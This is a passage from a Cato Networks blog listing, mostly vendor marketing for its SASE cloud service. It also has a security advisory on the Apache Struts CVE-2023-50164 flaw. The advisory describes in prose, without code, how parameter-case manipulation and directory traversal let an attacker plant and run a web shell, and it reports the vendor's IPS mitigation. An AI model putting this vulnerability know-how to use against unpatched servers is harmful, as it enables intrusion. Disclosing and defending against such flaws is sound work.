we’ve seen in the previous post; this series provides an overview of the current best practices for OS identification based on network protocols. 

The Path to SASE: A Project Planning Guide

Breaking Free from Legacy Constraints Enterprises often find themselves tethered to complex and inflexible network architectures that impede their journey towards business agility and operational... Read ›
The Path to SASE: A Project Planning Guide Breaking Free from Legacy Constraints Enterprises often find themselves tethered to complex and inflexible network architectures that impede their journey towards business agility and operational efficiency. Secure Access Service Edge, or SASE, a term coined by Gartner in 2019, defines a newer framework that converges enterprise networking and security point solutions into a single, secure, cloud-native, and globally distributed solution that secures all edges. SASE represents a strategic response to the changing needs and challenges of modern enterprises, delivering a secure, resilient, and optimized foundation essential to achieving the expected outcomes of digital transformation. But digital transformation can be hard to define in practice. It can be an iterative process of researching, planning, and evaluating what changes will yield the most benefit for your organization. This blog post provides a practical roadmap for SASE project planning, incorporating essential considerations and key recommendations that will help guide your path to a successful implementation, meeting the needs of your business now, and in the future. Let's take the first step. Start With the Stakeholders For a successful SASE migration, it's extremely beneficial to unite security and network operations teams (if such unity does not already exist). This collaboration ensures both the security and performance aspects of the network are considered. Appointing a neutral project leader is recommended – they'll ensure all requirements are met and communicated effectively. Take a tip from Gartner and engage owners of strategic applications, and workforce and branch office transformational teams. Collaboration is key, especially if there is a broader, company-wide digital transformation project in planning or in effect. Setting Sail: Defining Your SASE Objectives Your SASE project should include clear objectives tailored to the unique needs of your business. Common goals for a SASE implementation include facilitating remote work and access, supporting global operations, enabling Secure Direct Internet Access (DIA), optimizing cloud connectivity, consolidating vendors, and embracing a Zero Trust, least privilege strategy to safeguard your network and establish a robust security posture. Plan to align your network and security policies with evolving organizational needs and processes, ensuring full data visibility, control, and threat protection. Prioritize a consistent user experience, and foster digital dexterity with a cloud-delivered solution that can cater to anticipated and unexpected needs. Blueprinting Success: Gathering Requirements It's essential to identify the sites, users, and cloud resources that need connectivity and security. Plan not only for now but also for future growth to avoid disruptions later. Pay attention to your applications. Real-time apps like voice and video can suffer from quality loss. High Availability (HA) might also be a requirement for some of your sites. While most of HA responsibility lies with the SASE provider, there are steps your business can take to increase the resilience of site-based components. Map all Users Remote and mobile users who work from anywhere (WFA), are simply another edge. Ensuring a parallel experience to branch office peers across usability, security, and performance is crucial for these users. Map their locations to the PoPs offered by SASE providers, prioritizing proximity for minimized latency. Focus on SASE solutions hosting the security stack in PoPs where WFAs connect, eliminating the need to backhaul to the corporate datacenter, and supporting a single security policy for every user. This not only improves latency but also delivers a frictionless user experience. Map all Cloud Resources A vital component in SASE project planning is mapping all your cloud resources and applications (including SaaS applications), giving consideration to their physical locations in datacenters worldwide. The proximity of these datacenters to users directly affects latency and performance. Leading hosting companies and cloud platforms provide regional datacenters, allowing applications to be hosted closer to users. Identifying hosting locations and aligning them with a SASE solution’s PoPs in the cloud, that act as on-ramps to SaaS and other services, enhances application performance and provides a better user experience. Plan for the Future: SASE’s Promise of Adaptability Your network needs to be a growth enabler for your organization, adapting swiftly to planned and unknown future needs. Future-proofing your network is fundamental to avoiding building an inflexible solution that doesn't meet evolving requirements. Typical events could include expanding into new locations which will require secure networking, M&A activity that may involve integrating disparate IT systems, or moving more applications to the cloud. Legacy architectures like MPLS offer challenges such as sourcing, integration, deployment, and management of multiple point products, often taking months or longer to turn up new capabilities. In contrast, a cloud-delivered SASE solution can be turned up in days or weeks, saving time and alleviating resource constraints. Remember, if you are planning to move more applications to the cloud, it's important to identify SASE solutions with a distribution of PoPs that geographically align to where your applications are hosted, ensuring optimal application performance. [boxlink link="https://www.catonetworks.com/resources/how-to-plan-a-sase-project/"] How to Plan a SASE Project | Get the Whitepaper [/boxlink] SASE Shopping 101: Writing an RFI Once requirements have been identified, send out a Request for Information (RFI) to prospective SASE vendors. Ensure they grasp your business requirements, understand your goals, network resources, topology, and security stack, and can align their solution architecture with your specific needs. Dive deep into solution capabilities, customer and technical support models, and services. The RFI, in essence, sets the stage for informed decision-making before embarking on a Proof of Concept (PoC). Step-by-Step: Planning a Gradual Deployment With SASE, you can embrace a phased approach to implementation. Whether migrating from MPLS to SD-WAN, optimizing global connectivity, securing branch Internet access, accelerating cloud connectivity, or addressing remote access challenges, a gradual deployment helps mitigate risks. Start small, learn from initial deployments, and scale with confidence. Presenting the SASE Proposition: Board Approval Getting buy-in from the Board is essential for network transformation projects. Position SASE as a strategic enabler for IT responsiveness, business growth, and enhanced security. Articulate its long-term financial impact, emphasizing ROI. Leverage real-world data and analyst insights to highlight the tangible benefits of SASE. Unifying Forces: Building Consensus Securing sponsorship from networking and security teams is critical. Highlight SASE’s strategic value across the enterprise, showcasing its ability to simplify complexity, reduce security risks, and streamline IT efforts. A successful SASE implementation facilitates initiatives like cloud migration, remote work, UCaaS, and global expansion, and empowers security professionals to mitigate risk effectively – essentially allowing them to meet the requirements of their roles. By simplifying protection schemes, enhancing network visibility, improving threat detection and response, and unifying security policies, SASE alleviates common security challenges effortlessly. The SASE Test Drive: Running a Successful PoC Before committing to a specific SASE solution, embark on a Proof of Concept (PoC). Keep it simple; focus on a few vendors, one or two specific use cases, and limit the PoC to a 30 or 60-day timeline. Test connectivity (across different global locations), application performance, and user experience. Evaluate how well the solution integrates with legacy equipment if that is to remain after SASE implementation. Remember, not all SASE solutions are created equal, so you'll need to document successes and challenges, and determine metrics for side-by-side vendor comparisons – laying the groundwork for an informed decision. The Final Frontier: Selecting your SASE Armed with comprehensive planning, stakeholder buy-in, and PoC insights, it’s time to make the decision. In determining the right fit for your organization, choose the SASE solution that aligns seamlessly with your business goals and objectives, offers scalability, agility, robust security, and demonstrates a clear ROI. In Conclusion By now, you've gained valuable insights into the essential requirements and considerations for planning a successful SASE project. This blog serves as your initial guide on your journey to SASE. Recognize that enterprise needs vary, making each project unique. Cato Networks’ whitepaper “How to Plan a SASE Project” has been an invaluable resource for enterprise IT leaders, offering deep and detailed insights that empower strategic decision-making. For a more comprehensive exploration into SASE project planning, download the whitepaper here.

How to Build the Perfect Network Without SLAs

If you are used to managed MPLS services, transitioning to Internet last-mile access as part of SD-WAN or SASE might cause some concern. How can... Read ›
How to Build the Perfect Network Without SLAs If you are used to managed MPLS services, transitioning to Internet last-mile access as part of SD-WAN or SASE might cause some concern. How can enterprises ensure they are getting a reliable network if they are not promised end-to-end SLAs? The answer: by dividing the enterprise backbone into the two last miles connected by a middle mile and then applying appropriate redundancy and failover systems and technologies in each section. In this blog post we explain how SD-WAN and SASE ensure higher reliability and network availability than legacy MPLS and why SLAs are actually overrated. This blog post is based on the ebook “The Future of the SLA: How to Build the Perfect Network Without MPLS”, which you can read here. The Challenge with SLAs While SLAs might create a sense of accountability, in reality enforcing penalties for missing an SLA has always been problematic. Exclusions limit the scope of any SLAs penalty. Even if the SLA penalties are gathered, they never completely compensate the enterprise for the financial and business damage resulting from downtime. And the last-mile infrastructure requirements for end-to-end SLAs often limited them to only the most important locations. Affordable last-mile redundancy, running active/active last-mile connections with automatic failover, wasn’t feasible for mid to small-sized locations. Until now. SD-WAN/SASE: The Solution to the Performance Problem SD-WANs disrupt the legacy approach for designing inherently reliable last-mile networks. By separating the underlay (Internet or MPLS) from the overlay (traffic engineering and routing intelligence), enterprises can enjoy better performance at reduced costs, to any location. Reduced Packet Loss - SD-WAN or SASE use packet loss compensation technologies to strengthen loss-sensitive applications. They also automatically choose the optimum path to minimize packet loss. In addition, Cato’s SASE enables faster packet recovery through its management of connectivity through a private network of global PoPs. Improved Uptime - SD-WAN or SASE run active/active connections with automatic failover/failback improves last-mile, as well as diverse routing, to exceed even the up-time targets guaranteed by MPLS. [boxlink link="https://www.catonetworks.com/resources/the-future-of-the-sla-how-to-build-the-perfect-network-without-mpls/"] The Future of the SLA: How to Build the Perfect Network Without MPLS | Get the eBook [/boxlink] Reducing Latency in the Middle Mile But while the last mile might be more resilient with SD-WAN and SASE, what about the middle mile? With most approaches the middle-mile includes the public Internet. The global public Internet is erratic, resulting in high latency and inconsistency. This is especially challenging for applications that offer voice, video or other real-time or mission-critical services. To ensure mission-critical or loss-sensitive applications perform as expected, a different solution is required: a private middle mile. When done right, performance can exceed MPLS performance without the cost or complexity. There are two main middle mile cloud alternatives: 1. Global Private Backbones These are private cloud backbones offered by AWS and Azure for connecting third-party SD-WAN devices. However, this option requires complex provisioning and could result in some SD-WAN features being unavailable, limited bandwidth, routing limits, limited geographical reach and security complexities. In addition, availability is also questionable. Uptime SLAs offered by cloud providers run 99.95% or ~264 minutes of downtime per year. Traditional telco service availability typically runs at four nines, 99.99% uptime for ~52 minutes of downtime per year. 2. The Cato Global Private Backbone Cato’s edge SD-WAN devices automatically connect to the nearest Cato PoP into the Cato Global Private Backbone. The Cato backbone is a geographically distributed, SLA-backed network of 80+ PoPs, interconnected by multiple tier-1 carriers that commit to SLAs around long-haul latency, jitter and packet loss. Cato backs its network with 99.999% uptime SLA (~5m of downtime per year). With Cato’s global private backbone, there is no need for the operational headache of HA planning and ensuring redundancy.  As a fully distributed, self-healing service, Cato includes many tiers of redundancies across PoPs, nodes and servers. Cato also optimizes the network by maximizing bandwidth, real-time path selection and packet loss correction, among other ways. Overall, Cato customers have seen 10x to 20x improved throughput when compared to MPLS or an all Internet connection, at a significantly lower cost than MPLS. The Challenge with Telco Services While a fully managed telco service might also seem like a convenient solution, it has its set of limitations: Telco networks lack global coverage, requiring the establishment of third party relations  to connect locations outside their operating area. Loss of control and visibility, since telco networks limit enterprises' ability to change their WAN configuration themselves. High costs, due to legacy and dedicated infrastructure and appliances. Rigid service, due to reliance on the provider’s network and product expertise. Do We Need SLAs? Ensuring uptime can be achieved without SLAs. Technology can help.  Separating the underlay from the overlay and the last mile from the middle mile results in a reliable and optimized global network without the cost or lock-in of legacy MPLS services. To learn more about how to break out of the chain of old WAN thinking and see how a global SASE platform can transform your network, read the entire ebook, here.

Apache Struts 2 Remote Code Execution (CVE-2023-50164) – Cato’s Analysis and Mitigation

By Vadim Freger, Dolev Moshe Attiya On December 7th, 2023, the Apache Struts project disclosed a critical vulnerability (CVSS score 9.8) in its Struts 2... Read ›
Apache Struts 2 Remote Code Execution (CVE-2023-50164) – Cato’s Analysis and Mitigation By Vadim Freger, Dolev Moshe Attiya On December 7th, 2023, the Apache Struts project disclosed a critical vulnerability (CVSS score 9.8) in its Struts 2 open-source web framework. The vulnerability resides in the flawed file upload logic and allows attackers to manipulate upload parameters, resulting in arbitrary file upload and code execution under certain conditions. There is no known workaround, and the only solution is to upgrade to the latest versions, the affected versions being: Struts 2.0.0 - Struts 2.3.37 (EOL) Struts 2.5.0 - Struts 2.5.32 Struts 6.0.0 - Struts 6.3.0 The Struts framework, an open-source Java EE web application development framework, is somewhat infamous for its history of critical vulnerabilities. Those include, but are not limited to, CVE-2017-5638 which was the vector of the very public Equifax data breach in 2017 resulting in the theft of 145 million consumer records, which was made possible due to an unpatched Struts 2 server. At the time of disclosure, there were no known attempts to exploit, but several days later on December 12th, a Proof-of-Concept (POC) was made publicly available. Immediately, we saw increased scanning and exploitation activity across Cato’s global network. Within one day, Cato had protected against the attack. [boxlink link="https://www.catonetworks.com/rapid-cve-mitigation/"] Rapid CVE Mitigation by Cato Security Research [/boxlink] Details of the vulnerability The vulnerability is made possible by combining two flaws in Struts 2, allowing attackers to manipulate file upload parameters to upload and then execute a file. This vulnerability stems from the manipulation of file upload parameters. The first flaw involves simulating the file upload, where directory traversal becomes possible along with a malicious file. This file upload request generates a temporary file corresponding to a parameter in the request. Under regular circumstances, the temporary file should be deleted after the request ends, but in this case, the temporary file is not deleted, enabling attackers to upload their file to the host.The second flaw is the case-sensitive nature of HTTP parameters. Sending a capitalized parameter and later using a lowercase parameter with the same name in a request makes it possible to modify a field without undergoing the usual checks and validations. This creates an ideal scenario for employing directory traversal to manipulate the upload path, potentially directing the malicious file to an execution folder. From there, an attacker can execute the malicious file, for instance, a web shell to gain access to the server. Cato’s analysis and response to the CVE From our data and analysis at Cato’s Research Labs we have seen multiple exploitation attempts of the CVE across Cato customer networks immediately following the POC availability.Attempts observed range from naive scanning attempts to real exploitation attempts looking for vulnerable targets. Cato deployed IPS signatures to block any attempts to exploit the RCE in just 24 hours from the date of the POC publication, protecting all Cato-connected edges – sites, remote users, and cloud resources -- worldwide from December 13th, 2023. Nonetheless, Cato recommends upgrading all vulnerable webservers to the latest versions released by the project maintainers.

With New Third-Party Integrations, Cato Improves Reach and Helps Customers Cuts Costs

Consider this: By the end of 2024, Gartner has projected that over 40% of enterprises will have explicit strategies in place for SASE adoption compared... Read ›
With New Third-Party Integrations, Cato Improves Reach and Helps Customers Cuts Costs Consider this: By the end of 2024, Gartner has projected that over 40% of enterprises will have explicit strategies in place for SASE adoption compared to just 1% in 2018. As the “poster child” of SASE (Forrester Research’s words not mine), Cato has seen first-hand SASE’s incredible growth not just in adoption by organizations of all sizes, but also in terms of third-party vendor requests to integrate Cato SASE Cloud into their software. The Cato API provides the Cato SASE Experience programmatically to third parties. Converging security and networking information into a single API reduces ingestion costs a simplifies data retrieval. It’s this same kind of elegant, agile, and smart approach that typifies the Cato SASE Experience. Over the past year, nearly a dozen technology vendors released Cato integrations including Artic Wolf, Axonius, Google, Rapid7, Sekoia, and Sumo Logic. Cato channel partners, like UK-based Wavenet, have also done their own internal integrations, reporting significant ROI improvements. “So many of vendors who didn’t give us the time-of-day are now approaching and telling us that their customers are demanding they integrate with Cato,” says Peter Lee, worldwide strategic sales engineer and Cato’s subject matter expert on the Cato API.  One API To Rule them All As a single converged platform, Cato offers one API for fetching security, networking, and access data worldwide about any site, user, or cloud resource. A single request allowed developers to fetch information on a specific object, class of events or timeframe – from any location, user, and cloud entity, or for all objects across their Cato SASE Cloud account. This single “window into the Cato world” is one of the telltale signs of a true SASE platform. Only by building a platform with convergence in mind could Cato create a single API for accessing events related to SD-WAN and networking, as well as security events from our SWG, CASB, DLP, RBI, ZTNA/SDP, IPS, NGAM, and FWaaS capabilities. All are delivered in the same format and structure for instant processing. By contrast, product-centric approaches require developers to make multiple requests to each product and for each location. One request would be issued for firewall events, another for IPS events, still another for connectivity events for each enterprise location. Multiple locations will require separate requests. And each product would deliver data in a different format and structure, requiring further investment to normalize them before processing. [boxlink link="https://www.catonetworks.com/resources/the-future-of-the-sla-how-to-build-the-perfect-network-without-mpls/"] The Future of the SLA: How to Build the Perfect Network Without MPLS | Get the eBook [/boxlink] Channel Partners Realizes Better ROI Due to Cato API The difference between the two is more than semantic; it reflects on the bottom line. Just ask Charlie Riddle. Riddle heads up product integration for Wavenet, a UK-based MSP offering a converged managed SOC service based on Microsoft and Cato SASE Cloud.   He had a customer who switched from ingesting data from legacy firewalls to ingesting data from Cato. “Cato’s security logs are so efficient that when ingested into our 24/7 Managed Security Operations Centre (SOC), a 500-user business with 20+ sites saved £2,000 (about $2,500) per month, about 30% of the total SOC cost, just in Sentinel log ingestion charges,” he says. For Cato customers, Wavenet only needed to push the log data into its SIEM, not the full network telemetry data, to ensure accurate event correlation.  And because Wavenet provides both the Cato network and the SOC, Wavenet’s SOC team is able to use Cato’s own security tools directly to investigate alerts and to respond to them, rather than relying only on EDR software or the SIEM itself. Managing the network and security together this way improves both threat detection and response, while reducing spend.   Partners Address a Range of Use Cases with Cato Providing security, networking, and access data through one interface has led to a range of third-party integrations. SIEMs need to ingest Cato data for comprehensive incident and event management. Detection and response use Cato data to identify threats. Asset management systems tap Cato data to track what’s on the network. Sekoia.io XDR, for example, ingests and enriches Cato SASE Cloud log and alerts to fuel their detection engines. "The one-click "cloud to cloud" integration between Cato SASE Cloud and Sekoia.io XDR allows our customers to leverage the valuable data produced by their Cato solutions and drastically improve their detection and orchestration capabilities within a modern SOC platform," Georges Bossert, CTO of Sekoia.io, a European cybersecurity company. (Click here for more information about the integration) Another vendor, Sumo Logic, ingests Cato’s security and audit events, making it easy for users to add mission-critical context about their SASE deployment to existing security analytics, automatically correlate Cato security alerts with other signals in Sumo Logic’s Cloud SIEM, and simplify audit and compliance workflows. “Capabilities delivered via a SASE leader like Cato Networks has become a critical part of modern organizations’ response to remote work, cloud migration initiatives, and the overall continued growth of SaaS applications required to run businesses efficiently,” said Drew Horn, Senior Director of Technology Alliances, Sumo Logic. “We’re excited to partner with Cato Networks and enable our joint customers the ability to effectively ensure compliance and more quickly investigate potential threats across their applications, infrastructure and digital workforce.” (Click here for more information about the Sumo Logic integration.) Partners and Enterprises Can Easily Integrate Cato SASE Cloud into Their Infrastructure To learn more about how to integrate with Cato, check out our technical information about the Cato API here.  For a list of third-party integrations with Cato, see this page.

How Long Before Governments Ban Use of Security Appliances?

Enterprises in the private sector look to the US federal government for cybersecurity best practices. The US CISA (Cybersecurity & Infrastructure Security Agency) issues orders... Read ›
How Long Before Governments Ban Use of Security Appliances? Enterprises in the private sector look to the US federal government for cybersecurity best practices. The US CISA (Cybersecurity & Infrastructure Security Agency) issues orders and directives to patch existing products or avoid use of others. The US NIST (National Institute of Standards and Technology) publishes important documents providing detailed guidance on various security topics such as its Cybersecurity Framework (CSF). CISA and NIST, like their peer government agencies in the world, have dedicated teams of experts tasked with quantifying the risks of obsolete security solutions and discovered vulnerabilities, and the urgency of safeguarding against their exploitation. Such agencies do not exist in the private sector. If you are not a well-funded organization with an established team of cyber experts, following the government’s guidance is both logical and effective. What you should do vs what you can do Being aware of government agencies guidance on cyber security is extremely important. Awareness, however, is just one part of the challenge. The second part, usually the much bigger part, is following their guidance. Instructions, also referred to as ‘orders’ or ‘directives,’ to update operating systems and patch hardware products arise on a weekly basis, and most enterprises, both public and private, struggle to keep up. Operating systems like Windows and macOS have come a long way in making software updates automatic and simple to deploy. Many enterprises have their computers centrally managed and can roll out a critical software update in a matter of hours or days. Hardware appliances, on the other hand, are not so simple to patch. They often serve as critical infrastructure so IT must be careful about disrupting their operation, often delaying until a weekend or holiday. Appliances such as routers, firewalls, secure web gateways (SWG) and intrusion prevention systems (IPS) have well-earned reputations of being extremely ‘sensitive’ to updates. Historically, they do not continue to operate the same after a patch or fix, leading to lengthy and frustrating troubleshooting, loss of productivity and heightened risk of attack. The challenge in rapidly patching appliances is known to governments as it is known to cyber attackers. Those appliances, often (mis)trusted as the enterprise perimeter security, are effectively the easy and preferred way for attackers to enter an enterprise. [boxlink link="https://www.catonetworks.com/resources/cato-networks-sase-threat-research-report/"] Cato Networks SASE Threat Research Report H2/2022 | Get the Report [/boxlink] The CISA KEV Catalog – Focus on what’s important Prioritization has become a necessity as  most enterprises can’t really spend their resources in continuous patching cycles. The US CISA’s Known Exploited Vulnerability (KEV) catalog which mandates the most critical patches for government organizations, helps enterprises in the private sector know where to focus their efforts. The KEV catalog also exposes some important insights worth paying attention to. Cloud-native security vendors such as Imperva Incapsula, Okta, Cloudflare, Cato Networks and Zscaler don’t have a single record in the database. This is because their solution architecture allows them to patch and fix vulnerabilities in their ongoing service, so enterprises are always secured. Hardware vendors, on the other hand, show a different picture. As of September of 2023, Cisco has 65 records, VMware has 22 records, Fortinet has 11 records, and Palo Alto Networks has 4 records. Cyber risk analysis and the inevitable conclusion CISA’s KEV is just the tip of the iceberg. Going into the full CVE (Common Vulnerabilities and Exposures) database shows a much more concerning picture. FortiOS, the operating system used across all of Fortinet’s NGFWs has over 130 vulnerabilities associated with it, 31 of which disclosed in 2022, and 14 in the first 9 months of 2023. PAN-OS, the operating system in Palo Alto Networks’ NGFWs has over 150 vulnerabilities listed. Cisco ASA, by the way, is nearing 400. For comparison, Okta, Zscaler and Netskope are all in the single-digit range, and as cloud services, are able to address any CVE in near-zero time, and without any dependency on end customers. Since most enterprises lack the teams and expertise to assess the risk of so many vulnerabilities and the resources to continuously patch them, they are forced by reality to leave their enterprises exposed to cyber-attacks. The risk of trusting in appliance-based security vs. cloud-based security is clear and unquestionable. It is clear when you look at CISA’s KEV and even clearer when you look at the entire CVE database. All of this leads to the inevitable conclusion that at some point, perhaps not too far ahead in the future, government agencies such as the US NIST and CISA will recommend against or even ban appliance-based security solutions. Some practical advice If you think the above is a stretch, just take a look at Fortinet’s own analysis of a recent vulnerability, explicitly stating it is targeted at governments and critical infrastructure: https://www.fortinet.com/blog/psirt-blogs/analysis-of-cve-2023-27997-and-clarifications-on-volt-typhoon-campaign. Security appliances have been around for decades, and yet, the dream of a seamless, frictionless, automatic and risk-free patching for these products never came true. It can only be achieved with a cloud-native security solution. If your current security infrastructure is under contract and appliance-based, start planning how you are going to migrate from it to a cloud-native security at the coming refresh cycle. If you are refreshing now or about to soon, thoroughly consider the ever-increasing risk in appliances.

Cato Application Catalog – How we supercharged application categorization with AI/ML

New applications emerge at an almost impossible to keep-up-with pace, creating a constant challenge and blind spot for IT and security teams in the form... Read ›
Cato Application Catalog – How we supercharged application categorization with AI/ML New applications emerge at an almost impossible to keep-up-with pace, creating a constant challenge and blind spot for IT and security teams in the form of Shadow IT. Organizations must keep up by using tools that are automatically updated with latest developments and changes in the applications landscape to maintain proper security. An integral part of any SASE product is its ability to accurately categorize and map user traffic to the actual application being used. To manage sanctioned/unsanctioned applications, apply security policies across the network based on the application or category of applications, and especially for granular application controls using CASB, a comprehensive application catalog must be maintained. At Cato, keeping up required building a process that is both highly automated and just as importantly, data-driven, so that we focus on the applications most in-use by our customers and be able to separate the wheat from the chaff.In this post we’ll detail how we supercharged our application catalog updates from a labor-intensive manual process to an AI/ML based process that is fully automated in the form of a data-driven pipeline, growing our rate of adding new application by an order of magnitude, from tens of application to hundreds added every week. What IS an application in the catalog? Every application in our Application Catalog has several characteristics: General – what the company does, employees, where it’s headquartered, etc. Compliance – certifications the application holds and complies with. Security – features supported by the application such as if it supports TLS or Two-Factor authentication, SSO, etc. Risk score – a critical field calculated by our algorithms based on multiple heuristics (detailed here later) to allow IT managers and CISOs focus on actual possible threats to their network. Down to business, how it actually gets done We refer to the process of adding an application as “signing” it, that is, starting from the automated processes up to human analysts going over the list of apps to be released in the weekly release cycle and giving it a final human verification (side note: this is also presently a bottleneck in the process, as we want the highest control and quality when publishing new content to our production environment, though we are working on ways to improve this part of the process as well). As mentioned, first order of business is picking the applications that we want to add, and for that we use our massive data lake in which we collect all the metadata from all traffic that flows through our network.We identify these by looking at the most used domains (FQDNs) in our entire network, repeating across multiple customer accounts, which are yet to be signed and are not in our catalog. [boxlink link="https://catonetworks.easywebinar.live/registration-everything-you-wanted-to-know-about-ai-security"] Everything You Wanted To Know About AI Security But Were Afraid To Ask | Watch the Webinar [/boxlink] The automation is done end-to-end using “Shinnok”, our in-house tool developed and maintained by our Security Research team, taking the narrowed down list of unsigned apps Shinnok begins compiling the 4 fields (description, compliance, security & risk score) for every app. Description – This is the most straightforward part, and based on info taken via API from Crunchbase Compliance – Using a combination of online lookups and additional heuristics for every compliance certification we target; we compile the list of supported certifications by the app.For example by using Google’s query API for a given application + “SOC2”, and then further filtering the results for false positives from unreliable sources we can identify support for the SOC2 compliance. Security – Similar to compliance, with the addition of using our data lake to identify certain security features being used by the app that we observe over the network. Risk Score – Being the most important field, we take a combination of multiple data points to calculate the risk score: Popularity: This is based on multiple data points including real-time traffic data from our network to measure occurrences of the application across our own network and correlated with additional online sources. Typically, an app that is more popular and more well-known poses a lower risk than a new obscure application. CVE analysis: We collect and aggregate all known CVEs of the application, obviously the more high-severity CVEs an application has means it has more opening for attackers and increases the risk to the organization. Sentiment score: We collect news, mentions and any articles relating to the company/application, we then build a dataset with all mentions about the application.We then pass this dataset through our advanced AI deep learning model, for every mention outputting whether it is a positive or negative article/mentions, generating a final sentiment score and adding it as a data point for the overall algorithm. Distilling all the different data points using our algorithms we can calculate the final Risk Score of an app. WIIFM? The main advantage of this approach to application categorization is that it is PROACTIVE, meaning network administrators using Cato receive the latest updates for all the latest applications automatically. Based on the data we collect we evaluate that 80% - 90% of all HTTP traffic in our network is covered by a known application categorization.Admins can be much more effective with their time by looking at data that is already summarized giving them the top risks in their organization that require attention. Use case example #1 – Threads by Meta To demonstrate the proactive approach, we can take a look at a recent use case of the very public and explosive launch of the Threads platform by Meta, which anecdotally regardless of its present success was recorded as the largest product launch in history, overtaking ChatGPT with over 100M user registrations in 5 days.In the diagram below we can see this from the perspective of our own network, checking all the boxes for a new application that qualifies to be added to our app catalog. From the numbers of unique connections and users to the numbers of different customer accounts in total that were using Threads. Thanks to the automated process, Threads was automatically included in the upcoming batch of applications to sign. Two weeks after its release it was already part of the Cato App Catalog, without end users needing to perform any actions on their part. Use case example #2 – Coverage by geographical region As part of an analysis done by our Security Research team we identified a considerable gap in our coverage of application coverage for the Japanese market, and this coincided with feedback received from the Japan sales teams on lacking coverage.Using the same automated process, this time limiting the scope of the data from our data lake being inputted to Shinnok only from Japanese users we began a focused project of augmenting the application catalog with applications specific to the Japanese market, we were able to add more than 600 new applications over a period of 4 months. Following this we’ve measured a very substantial increase in the coverage of apps going from under 50% coverage to over 90% of all inspected HTTP traffic to Japanese destinations. To summarize We’ve reviewed how by leveraging our huge network and data lake, we were able to build a highly automated process, using real-time online data sources, coupled with AI/ML models to categorize applications with very little human work involved.The main benefits are of course that Cato customers do not need to worry about keeping up-to-date on the latest applications that their users are using, instead they know they will receive the updates automatically based on the top trends and usage on the internet.

From Shadow to Guardian: The Journey of a Hacker-Turned Hero 

In the ever-evolving landscape of cybersecurity, the line between the defenders and attackers often blurs, with skills transferable across both arenas. It’s a narrative not... Read ›
From Shadow to Guardian: The Journey of a Hacker-Turned Hero  In the ever-evolving landscape of cybersecurity, the line between the defenders and attackers often blurs, with skills transferable across both arenas. It’s a narrative not unfamiliar to many in the cybersecurity community: the journey from black hat to white hat, from outlaw to protector.   In the 15th episode of Cato Networks’ Cyber Security Master Class, hosted by Etay Maor, Senior Director of Security Strategy, we had the privilege of witnessing such a transformative story unfold.  Hector Monsegur, once known in the darker corners of the internet, shared his gripping journey of becoming one of the good guys – a white hat hacker. Monsegur is a former Lulzsec hacker group leader Sabu and currently serves as director of research at Alacrinet.  His story is not just one of redemption but is a beacon of invaluable insights into the complex cybersecurity landscape.  The Allure of the Abyss  Monsegur’s tale began in the abyss, the place where many black hat hackers find a home. Drawn by the allure of challenge and the thrill of breaking into seemingly impregnable systems, Monsegur recounted his early days of cyber mischief. Like many others in his position, it wasn’t greed or malice that fueled his journey; it was curiosity and the quest for recognition in a community that celebrates technical prowess.  However, as he emphasized in his conversation with Maor, the actions of black hat hackers have real-world consequences. They affect lives, destroy businesses, and even threaten national security. It was this realization, alongside consequential run-ins with the law, that marked the turning point in Monsegur’s life.   [boxlink link="https://catonetworks.easywebinar.live/registration-becoming-a-white-hat"] Becoming a White Hat : An interview with a former Black Hat | Watch the Webinar [/boxlink] Crossing the Chasm  The transition from black hat to white hat is more than just a title change – it’s a complete ideological shift. For Monsegur, the journey was fraught with challenges. Rebuilding trust was one of the significant hurdles he had to overcome. He had to prove his skills could be used for good, to defend and protect, rather than to disrupt and damage.   It was through this difficult transition that Monsegur highlighted the importance of opportunity. Many black hats lack the channel to pivot their skills into a legal and more constructive cybersecurity career. Monsegur’s case was different. He was presented with a chance to help government agencies fend off the kind of attacks he once might have initiated, turning his life around and setting a precedent for other reformed hackers.  A Valuable Perspective  One of the most compelling takeaways from the interview was the unique perspective that former black hats bring to the table. Having been on the other side, Monsegur understands the mindsets and tactics of cyber attackers intrinsically. This insider knowledge is invaluable in anticipating and mitigating attacks before they happen.  In his white hat role, Monsegur has been instrumental in helping organizations understand and fortify their cyber defenses. His approach goes beyond traditional methods – it’s proactive, driven by an intimate knowledge of how black hat hackers operate.  The White Hat Ethos  Becoming a white hat hacker is not merely a career change; it is an ethos, a commitment to using one’s skills for the greater good. Monsegur emphasized the satisfaction derived from protecting people and institutions from the threats he once posed. This fulfillment, according to him, surpasses any thrill that black hat hacking ever offered.  In his dialogue with Maor, Monsegur didn’t shy away from addressing the controversial aspects of his past. Instead, he leveraged his experiences to educate and warn of the dangers lurking in the cyber shadows. He expressed a desire to guide those walking a similar path to his past, steering them towards using their talents constructively.  Fostering Redemption in Cybersecurity  The cybersecurity community, Monsegur believes, has a role to play in fostering redemption. He advocates for the creation of paths for black hats to reform and join the ranks of cybersecurity professionals. By providing education, mentorship, and employment opportunities, the community cannot only help rehabilitate individuals but also strengthen its defenses with their unique skill sets.  Monsegur’s story serves as a powerful reminder that the road to redemption is possible. It emphasizes that when directed positively, the skills that once challenged the system can become its greatest shield.  Closing Thoughts  As the interview ended, the overarching message was clear: transformation is possible, and it can lead to powerful outcomes for both the individual and the broader cybersecurity ecosystem. Hector Monsegur’s journey from black hat to white hat hacker is not just a personal victory but a collective gain for the community seeking to safeguard our digital world.  Through stories like Monsegur’s, we find hope and a reminder that within every challenge lies the potential for growth and change. It is up to us, the cybersecurity community, to embrace this potential and transform it into a force for good.  

Cato Networks Takes a Bite of the Big Apple 

My new favorite company took center stage in iconic New York Times Square today with a multi-story high 3D visualization of our revolutionary secure access... Read ›
Cato Networks Takes a Bite of the Big Apple  My new favorite company took center stage in iconic New York Times Square today with a multi-story high 3D visualization of our revolutionary secure access service edge (SASE) platform. It’s positively mesmerizing, take a look:  The move signals a seismic shift happening across enterprises, the need to have an IT infrastructure that can easily adapt to anything at any time, and the transformative power of Cato’s networking and security platform.  Nasdaq’s Time Square marquee tells our story: Cato was born from the idea of bringing the highest levels of networking, security, and access once reserved for the Fortune 100 to every enterprise on the planet. We pioneered a new approach to delivering these essential IT services by replacing complex legacy networking and security software and infrastructure with a single cloud-native platform.   [boxlink link="https://www.catonetworks.com/resources/cato-named-a-challenger-in-the-gartner-magic-quadrant-for-single-vendor-sase/"] Cato named a Challenger in the Gartner® Magic Quadrant™ for Single-vendor SASE | Get the Report [/boxlink] And we have become the leader in SASE, delivering enterprise-class security and zero-trust network access to companies of all sizes, worldwide and in a way that is simple – simple to deploy, simple to manage, simple to adapt to disaster, epidemic outbreak and any other unforeseen challenge. With our SASE platform, we create a seamless, agile, and elegant experience for enteprises that enables powerful threat 